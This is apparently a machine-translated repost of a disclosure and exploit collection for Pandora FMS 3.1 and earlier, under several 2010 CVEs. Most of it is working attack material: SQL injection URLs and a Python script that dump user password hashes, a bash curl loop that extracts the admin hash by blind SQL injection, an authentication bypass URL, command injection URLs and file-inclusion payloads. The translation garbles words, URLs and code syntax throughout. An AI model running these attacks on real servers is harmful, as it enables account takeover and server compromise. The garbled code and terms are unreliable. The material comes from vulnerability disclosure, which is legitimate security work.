Server monitoring software Pandora FMS & amp; lt; = more than 3.1 Security Vulnerabilities

Pandora FMS is a server monitoring software. Pandora FMS <= 3.1 has multiple security vulnerabilities, including directory traversal, SQL injection, system command injection, verification bypass, and other vulnerabilities. Multiple security threats may occur.

[+] Info:
~~~~~~~~~
Pandora FMS <= 3.1 SQL Injection
Pandora FMS <= 3.1 Authentication Bypass
Pandora FMS <= 3.1 OS Command Injection
Pandora FMS <= 3.1 Blind SQL Injection
Pandora FMS <= 3.1 Path Traversal and LFI
CVE-2010-4280
CVE-2010-4279
CVE-2010-4278
CVE-2010-4282

[+] Poc:
~~~~~~~~~
SQLi:
Http: // host/pandora_console/ajax. php? Page = operation/agentes/ver_agente & get_agents_group_json = 1 & id_group = 1/**/and/**/1 = 0 /**

/Union/**/select/**/id_user, password/**/from/**/tusuario
 

View source
 
Print?
01 # Pandora Flexible Monitoring System SQL Injection PoC

02 # Juan Galiana Lara

03 # Gets the list of users and password from the database

04 #

05 # configure cookie & host before use it

06 # usage

07 # python sqlinj_users.py

08 # admin: 75b756ff2785ea8bb9ae02c13b6a71f1

09 #...

10

11 import json

12 import urllib2

13

14 headers = {"Cookie": "PHPSESSID = a4s3nf1tqv2fau8s6qhi6rutp9dahe9o "}

15

16 url = "http: // HOST/pandora_console/ajax. php ";

17 url + =

18 "? Page = operation/agentes/ver_agente & get_agents_group_json = 1 & id_group = 1"

19 url + =

20 "/**/and/**/1 = 0/**/union/**/select/**/id_user, password/**/from/**/tusuario"

21

22 req = urllib2.Request (url, headers = headers)

23 resp = urllib2.urlopen (req)

24

25 users = json. read (resp. read ())

26 for user in users:

27 print (user ["id_agente"] + ":" + user ["nombre"])
Authentication Bypass:
Http: // servername/pandora_console/index. php? Loginhash_data = 21232f297a57a5a743894a0e4a801fc3 & loginhash_user = admin & loginhash = 1

OS Command Injection:
Http: // servername/pandora_console/index. php? Login = 1 & login = 1 & sec = estado & sec2 = operation/agentes/networkmap & refr = 0 & layout = 1; uname % 20-a;
Http: // servername/pandora_console/index. php? Login = 1 & sec = estado & sec2 = operation/agentes/networkmap & refr = 0 & layout = 1; id;

Blind SQL Injection:
Http: // host/pandora_console/index. php? Sec = estado & sec2 = operation/agentes/estado_agente & group_id = 24% 29% 20and % 20% 28 select % 20 password % 20 from % 20 tusuario % 20 where % 20ord % 28 substring % 28 password, 29% 49% 29 = 29% 20and % 20id_user = 0x61646d696e % 20% 20 union % 20 select % 20id_agente, % 20 nombre % 20 from % 20 tagente % 20 where % 20id_grupo % 20in % 281
 

View source
 
Print?
01 Exploit:

02

03 #! /Bin/bash

04 # Pandora Flexible Monitoring System Blind SQL Injection PoC

05 # Juan Galiana Lara

06 # Gets the md5 hash password from a specific user

07 #

08 # configure host, cookie & group_id before use it

09 # usage

10 # $./getpassword. sh

11 #74b444ff2785ea8bb9ae02c13b6a71f1

12

13 HOST = "HOST"

14 TARGET_USER = "0x61646d696e" # admin

15 PATTERN = "Interval"

16 COOKIE = "rq842tci6e5ib7t918c6sv1ml4"

17 CHARSET = (0 1 2 3 4 5 6 7 8 9 a B c d e f g h I j k l m n o p q r s t u v

18 w x y z)

19 GROUP_ID = 2

20

21 j = 1

22 while [[$ j-lt 33]; do

23 I = 0

24 while [[$ I-lt $ {# CHARSET [()]}]; do

25 c =$ (printf % d "$ {CHARSET [$ I]}")

26

27 URL = "http: // $ HOST/pandora_console/index. php? Sec = estado & sec2 = operation/agentes/estado_agente & group_id = $ GROUP_ID % 29% 20and % 20% 28 select % 20 password % 20 from % 20 tusuario % 20 where % 20ord % 28 substring % 28 password, $ j, 1% 29% 29 = $ c % 20and % 20id_user = $ TARGET_USER % 29% 20 union % 20 select % 20id_agente, % 20 nombre % 20 from % 20 tagente % 20 where % 20id_grupo % 20in % 20% 281 ";;

28 curl $ URL -- cookie "PHPSESSID = $ COOKIE" 2>/dev/null | grep-q

29 $ PATTERN;

30 if [$? -Eq 0]; then echo-n $ {CHARSET [$ I]}; break; fi;

31 let I ++

32 done;

33 if [[$ I-eq $ {# CHARSET [()]}]; then echo "Something wrong! ";

34 exit 1; fi

35 let j ++;

36 done

37 echo

38 exit 0
Path Traversal and LFI:
5.1-PHP File transfer Sion (or RFI/LFI: Remote/Local file transfer sion )-
CVE-2010-4281-CVE-2010-4282-CVSS 8.5/10

Parameter page of ajax. php is not properly sanitizing user-supplied
Input. The function safe_url_extraclean is filtering: character, and
It doesnt allow to use the string "http: //"; to create urls, but allows
/Character and an attacker cocould reference remote resources
Windows UNC files, using // servername // resource/file

Note that the first check in safe_url_extraclean is filtering: //, so
We can bypass the filter easily doing http: // url, and it only
Strip the first protocol: //. However, the last preg_replace strips:
Character.

Proof of concept:

UNC: http: // servername/pandora_console/ajax. php? Page = // server/share/test

As well, ajax. php allows to include any php file in the disk

Filesystem:
Http: // servername/pandora_console/ajax. php? Page = ../directory/file

Character % 00 is not allowed due safe_url_extraclean function filtering,
And is not possible to include other files distinct that php files,
Still allows. and/characters.

5.2-PHP File transfer Sion (or RFI Remote file Transfer sion)-CVE-2010-4283
--CVSS 7.9/10

An attacker can inject arbitrary PHP code and execute it